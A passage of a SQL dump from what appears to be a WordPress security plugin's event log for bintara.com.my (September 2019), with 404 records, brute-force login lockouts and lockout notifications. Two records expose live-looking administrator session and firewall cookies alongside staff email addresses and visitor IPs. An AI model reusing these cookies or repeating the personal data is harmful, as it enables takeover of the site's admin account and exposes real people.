gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:72:\"https://bintara.com.my/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:19:\"HTTP_X_MERGE_ASSETS\";s:4:\"true\";s:15:\"HTTP_X_PREBUILD\";s:4:\"true\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:72:\"https://bintara.com.my/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/\";s:19:\"REDIRECT_SCRIPT_URL\";s:50:\"/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYxdLY3Q4OJOIh3RJkl@OwAAAJE\";s:12:\"REDIRECT_URL\";s:50:\"/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"45834\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:72:\"https://bintara.com.my/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/\";s:10:\"SCRIPT_URL\";s:50:\"/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYxdLY3Q4OJOIh3RJkl@OwAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569479981.484\";s:12:\"REQUEST_TIME\";s:10:\"1569479981\";}}','notice','2019-09-26 06:39:43','2019-09-26 06:39:41',35171184,36974568,'https://bintara.com.my/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/',1,0,'103.6.198.69'),(27079,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYxbyxUSlOK4dwtqdubtywAAAEs\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"52036\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYxbyxUSlOK4dwtqdubtywAAAEs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569479628.0055\";s:12:\"REQUEST_TIME\";s:10:\"1569479628\";}}','notice','2019-09-26 06:33:49','2019-09-26 06:33:48',35127472,36930888,'https://bintara.com.my/our-history/about1/',1,0,'216.244.66.228'),(27078,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/wp-admin/admin-ajax.php\";s:14:\"CONTENT_LENGTH\";s:3:\"227\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"9\";s:13:\"H2_STREAM_TAG\";s:5:\"137-9\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:827:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569631347%7CJq4ofbaNHwFMnKeSwx4bJJ6eSOOkAe8N55vCR2vCLph%7C3a89a5aee47f796e1de0c2fdfb034c8fb022ee6998c8c7521a6e45e661688c14; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569631347%7CJq4ofbaNHwFMnKeSwx4bJJ6eSOOkAe8N55vCR2vCLph%7Ce3cc749f9f022dc99911154c242bda04b1d3594c780425642d14e4bedda54c07; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C8167cb283af3e1868ea1016d3a73efe87862f691065a130a5796d09a5d7b29fc; wp-saving-post=1-saved; wp-settings-time-1=1569473106; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_ORIGIN\";s:22:\"https://bintara.com.my\";s:12:\"HTTP_REFERER\";s:109:\"https://bintara.com.my/wp-admin/network/plugins.php?plugin_status=inactive&ip-geo-block-auth-nonce=418b88c3b6\";s:19:\"HTTP_SEC_FETCH_MODE\";s:4:\"cors\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:21:\"HTTP_X_REQUESTED_WITH\";s:14:\"XMLHttpRequest\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"9\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"137-9\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYxaZ43Q4OJOIh3RJkl7XwAAAAk\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYxaZ43Q4OJOIh3RJkl7XwAAAAk\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"61424\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYxaZ43Q4OJOIh3RJkl7XwAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569479271.2562\";s:12:\"REQUEST_TIME\";s:10:\"1569479271\";}}','notice','2019-09-26 06:27:53','2019-09-26 06:27:51',36028760,36284808,'https://bintara.com.my/wp-admin/admin-ajax.php',1,1,'115.132.145.128'),(27077,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{47D3AF49-A731-494D-AE10-A9F9ACEA85A0}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.5 (Build 18F132))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=74394EEF-70BA-4807-910A-FA1D9FB8E7FF\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYxZp43Q4OJOIh3RJkl6zAAAAIM\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"52343\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYxZp43Q4OJOIh3RJkl6zAAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569479079.7341\";s:12:\"REQUEST_TIME\";s:10:\"1569479079\";}}','notice','2019-09-26 06:24:41','2019-09-26 06:24:40',31097536,32913720,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.145.128'),(27075,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"4A793B59-1F3B-43C1-937F-F15612528A91\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYw3MnIO9r9oxFSVqE@dLgAAAM8\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"49672\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYw3MnIO9r9oxFSVqE@dLgAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569470258.909\";s:12:\"REQUEST_TIME\";s:10:\"1569470258\";}}','notice','2019-09-26 03:57:40','2019-09-26 03:57:39',31095640,32896272,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.128'),(27076,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:71:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"7\";s:13:\"H2_STREAM_TAG\";s:5:\"140-7\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:11:\"HTTP_COOKIE\";s:830:\"icwp-wpsf=6154a8f6f75db9018d0a71b28cd6a258; wordpress_test_cookie=WP+Cookie+check; wordpress_sec_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569631347%7CJq4ofbaNHwFMnKeSwx4bJJ6eSOOkAe8N55vCR2vCLph%7C3a89a5aee47f796e1de0c2fdfb034c8fb022ee6998c8c7521a6e45e661688c14; wordpress_logged_in_0ee2227feee739a5ae6b2b49cdc34ad0=pentadbirweb%7C1569631347%7CJq4ofbaNHwFMnKeSwx4bJJ6eSOOkAe8N55vCR2vCLph%7Ce3cc749f9f022dc99911154c242bda04b1d3594c780425642d14e4bedda54c07; wfwaf-authcookie-5c3291d0ff4517c34bd65cba2f4bc626=1%7Cadministrator%7C8167cb283af3e1868ea1016d3a73efe87862f691065a130a5796d09a5d7b29fc; wp-settings-time-1=1569468452; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26advImgDetails%3Dshow%26imgsize%3Dfull%26mfold%3Do%26hidetb%3D1%26editor_plain_text_paste_warning%3D1%26post_dfw%3Doff; wp-saving-post=3506-saved\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:19:\"HTTP_SEC_FETCH_SITE\";s:4:\"none\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Mobile Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"140-7\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:2:\"on\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:2:\"on\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"7\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"140-7\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYw5cY3Q4OJOIh3RJkle2AAAAAc\";s:19:\"REDIRECT_SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:19:\"REDIRECT_SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYw5cY3Q4OJOIh3RJkle2AAAAAc\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"60556\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:78:\"https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:10:\"SCRIPT_URL\";s:56:\"/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYw5cY3Q4OJOIh3RJkle2AAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569470833.3897\";s:12:\"REQUEST_TIME\";s:10:\"1569470833\";}}','notice','2019-09-26 04:07:15','2019-09-26 04:07:13',31652584,31914784,'https://bintara.com.my/wp-includes/js/tinymce/skins/lightgray/skin.min.css.map',1,1,'115.132.145.128'),(27073,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 10:42:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-26 02:42:48\";s:14:\"lockout_expire\";s:19:\"2019-09-30 14:42:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 06:42:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-26 02:42:50','2019-09-26 02:42:48',31260136,32715232,'https://bintara.com.my/wp/wp-login.php',1,0,'124.217.235.145'),(27074,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-26 02:42:50','2019-09-26 02:42:48',31883272,32715232,'https://bintara.com.my/wp/wp-login.php',1,0,'124.217.235.145'),(27070,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 10:36:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-26 02:36:12\";s:14:\"lockout_expire\";s:19:\"2019-09-30 14:36:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 06:36:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-26 02:36:17','2019-09-26 02:36:12',31269776,32718304,'https://bintara.com.my/test/wp-login.php',1,0,'110.4.45.222'),(27071,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout 